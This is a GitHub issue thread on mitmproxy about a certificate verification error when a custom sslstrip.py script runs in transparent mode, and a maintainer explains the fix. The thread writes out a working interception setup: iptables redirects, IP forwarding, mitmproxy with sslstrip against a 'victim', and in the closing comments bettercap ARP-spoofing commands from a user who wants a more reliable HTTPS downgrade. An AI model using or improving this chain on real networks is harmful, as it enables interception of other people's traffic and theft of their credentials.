### ISSUE TITLE
Certificate Verification Error with -T, not in regular mode

### ISSUE THREAD

**Issue by phackt** [mitmproxy/mitmproxy#1638]
##### Steps to reproduce the problem:

Mitmproxy v0.18.1

Hello Team, i'm creating a transparent proxy with a custom sslstrip.py script (keeping if possible clear connection between proxy and victim, and on the other side mitmproxy is replaying the https one on its side with the destination server).

On the routing machine with the mitmproxy running:
1. sysctl -w net.ipv4.ip_forward=1
2. echo 0 | sudo tee /proc/sys/net/ipv4/conf/*/send_redirects
3. iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
4. mitmproxy -T --anticache --host --anticomp --noapp --script ./sslstrip.py --eventlog

Victim is configured to route on the routing machine with mitmproxy running.
##### What is the expected behavior?

With regular proxy tests, everything is working fine, no certificate problem for mitmproxy when it's establishing the httpS connection.
##### What went wrong?

But in transparent mode:

GET https://assure.ameli.fr/
    ← Certificate Verification Error for 93.174.145.36: hostname '93.174.145.36' doesn't match u'assure.ameli.fr'

It seems that it's expecting the hostname, not the ip address of the destination server. Don't know what could be the root cause of this problem. I will be glad if you have an idea, i will be able to investigate further.

If needed can find all the stuff for my test here, mainly the screenshots done: 
https://github.com/phackt/share/tree/master/mitmproxy

Thanks again for your work guyz,
## Phackt.

Mitmproxy Version: v0.18.1
Operating System: Kali2 (Debian Jessie)

**Comment by mhils** [comment]
What kind of client are you using? Does it send a Server Name Indication as part of the TLS handshake?

**Comment by phackt** [comment]
I'm accessing via web browser (Chrome) on the victim's machine, but everything stripped is requested as classic HTTP connection from web browser, intercepted and detected as secured host with mitmproxy (previously stripped) so scheme is changed to https and port to 443. I add that i do not want to capture TLS initiated by victim's web browser (in case of HSTS and so on), just let it flow. 

Just wondering what can be changed between transparent and regular mode with the TLS connection initiating by mitmproxy (secured web server <--- HTTPS ---> mitmproxy <-- HTTP --> victim).

![screenshot_regular](https://cloud.githubusercontent.com/assets/19553457/19555542/84928702-96bd-11e6-8d10-421376050c25.png)

![screenshot_transparent](https://cloud.githubusercontent.com/assets/19553457/19555551/8abda6a2-96bd-11e6-90ea-35ee0945cd30.png)

**Comment by mhils** [comment]
So, mitmproxy _should_ use the client SNI for validating the upstream server certificate. Chrome usually sends a SNI, so that should work, The bug is either that (1) we don't parse the SNI correctly or (2) we don't process the SNI correctly or (3) there actually is no SNI sent by the client. 

Do you see anything SNI/ClientHello related in the event log? Alternatively, can you look if [this](https://github.com/mitmproxy/mitmproxy/blob/ceb12e86280f754f9147b208818cce9831bf7f86/mitmproxy/proxy/protocol/tls.py#L338) code executes properly (you can just `print(self._client_hello)`?

refs #1639

**Comment by phackt** [comment]
Hi, ok i will look at this asap and get back to you,  thanks

**Comment by phackt** [comment]
Just a precision, according to my configuration (website <- HTTPS -> mitmproxy <- HTTP -> victim), my victim is routing to mitmproxy in unsecure HTTP (thanks to sslstrip.py script), so no TLS handshake is performed by the browser of the victim. The following code in the sslstrip.py will change this and perform the TLS connection with the website from mitmproxy:

```python
if flow.request.pretty_host in secure_hosts:
        flow.request.scheme = 'https'
        flow.request.port = 443
````

I'm gonna check but it's quite weird that this behavior is not the same between Transparent and Regular mode, in Regular mode everything s working like a charm with the exact same configuration.

Regards,

**Comment by phackt** [comment]
Hello Back Maximilian,

So i have a response for this ticket. Considering that in Transparent mode the host attribute will be the ip of the target server (in my case 93.174.145.36) and knowing that the pretty_host attribute is dealing with the host request header (in my case assure.ameli.fr):

```python
@property
def pretty_host(self):
"""
Similar to :py:attr:`host`, but using the Host headers as an additional preferred data source.
This is useful in transparent mode where :py:attr:`host` is only an IP address,
but may not reflect the actual destination as the Host header could be spoofed.
"""
```

I solved the problem with adding flow.request.host = flow.request.pretty_host in the inline script sslstrip.py. So according to me this part of code won't be enough in case of mitmproxy in transparent mode for this sslstrip.py inline script:
```python
    if flow.request.pretty_host in secure_hosts:
        flow.request.scheme = 'https'
        flow.request.port = 443
```

While mitmproxy is performing the TLS handshake, i suppose that it gets the SNI thanks to the host attribute, so never found in transparent mode here. **My last question is: there is a way in an inline script to get the proxy mode (transparent)?** So i will be able to update the inline script sslstrip.py to test if we are in transparent mode, so i will set the host attribute the same that the pretty_host one.

Regards,

**Comment by mhils** [comment]
Thanks for digging into this! 😊 

> My last question is: there is a way in an inline script to get the proxy mode (transparent)?

You can access `master.options` from `mitmproxy.ctx` and check the mode there. However, just assigning `flow.request.host = flow.request.pretty_host` at the place you mentioned should be fine without any mode checks (and would also work in e.g. a SOCKS mode, which would suffer from the same issue). Most importantly, please add a comment describing why this is necessary and link to this issue! :smiley: 👍 

Thanks!

**Comment by phackt** [comment]
Quickest reply ever :), ok no prob i will just affect host to pretty_host it will work for all of the cases. Thanks :+1:

**Comment by ChillVibesMushroom** [comment]
What do you mean we have to setup the victim device to run through our proxy do you mean like on the router or on the device itself. 

I'm running mitmproxy and sslstrip.py I reset the router to run it as well and nothing came my way sadly so what am I doing wrong?

commands I used

sudo bettercap
net.probe on
net.show
set arp.spoof.targets ap ip, victim ip
set arp.spoof.fullduplex true
net.sniff on
arp.spoof on

sudo mitmdump -s sslstrip.py --mode transparent 

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080




I'm not getting any information coming my way through the proxy and since it's in transparent mode I shouldn't have to setup a proxy on the targets device correct because in the lesson I'm taking they don't do anything on the victim machine.


I was thinking about looking into the ssl certificates options in mitmproxy --help


I really want this to work though because its freaking awesome and it can help me in controlling network traffic.

**Comment by ChillVibesMushroom** [comment]
I had to modify the code a little bit and realized that this method is working for some sites but not all sites are vulnerable to it which is a relief to me but at the same time there are many things put into place for this method to work and I need a more stable method for downgrading https to http. 

Here are the rules and the pieces of code being used in this attack.

sudo resolvectl flush-caches
sysctl -w net.ipv4.ip_forward=1
echo 0 | sudo tee /proc/sys/net/ipv4/conf/*/send_redirects

sudo bettercap
net.probe on
net.show
set arp.spoof.targets ap ip, victim ip
set arp.spoof.fullduplex true
net.sniff on
arp.spoof on

 mitmproxy --mode transparent --anticache --anticomp --script ./sslstrip.py

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


I noticed this method worked better on Android but I need something that works successfully at all times.

Any ideas?
